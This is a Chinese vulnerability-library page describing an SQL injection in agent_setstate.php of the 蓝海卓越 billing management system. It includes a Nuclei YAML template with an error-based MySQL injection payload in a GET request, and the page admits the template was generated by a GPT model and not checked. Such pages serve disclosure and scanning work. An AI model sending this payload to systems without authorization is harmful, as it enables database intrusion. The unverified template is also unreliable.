蓝海卓越计费管理系统agent_setstate.php SQL注入漏洞-洞查文库
蓝海卓越计费管理系统agent_setstate.php SQL注入漏洞

蓝海卓越计费管理系统agent_setstate.php SQL注入漏洞

简介

蓝海卓越计费管理系统中的agent_setstate.php存在SQL注入的风险的接口,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

FOFA

漏洞复现

Nuclei Yaml

id: lanhaizhuoyue-agent-setstate-sql-injection

info:
  name: 蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞复现
  author: doc.vulexp.cn
  severity: high
  description: |
    蓝海卓越计费管理系统的 agent_setstate.php 页面存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句获取数据库信息。

variables:
  a: "{{rand_int(100, 999)}}"

http:
  - raw:
      - |
        GET /agent_setstate.php?id=(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(0x717a767071,(SELECT%20(ELT(6154=6154,{{a}}))),0x7170716a71,0x78))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "BIGINT value"
      - type: regex
        regex:
          - "qzvpq{{a}}qpqjqx"

Yaml文件由GPT模型生成,自行检查是否可用!
 

蓝海卓越计费管理系统agent_setstate.php SQL注入漏洞-洞查文库
蓝海卓越计费管理系统agent_setstate.php SQL注入漏洞
此内容为付费阅读,请付费后查看
洞币5
立即购买
您当前未登录!建议登陆后购买,可保存购买订单
付费阅读
已售 36
版权声明

   站内部分内容来源于互联网收集,本站仅提供网络资源分享服务,不拥有所有权,不承担任何相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请 联系我们 一经核实,立即删除。在为用户提供最好的产品同时,保证优秀的服务质量。


本站仅提供信息存储空间,不拥有所有权,不承担相关法律责任。
THE END
喜欢就支持一下吧
点赞19 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情图片

    暂无评论内容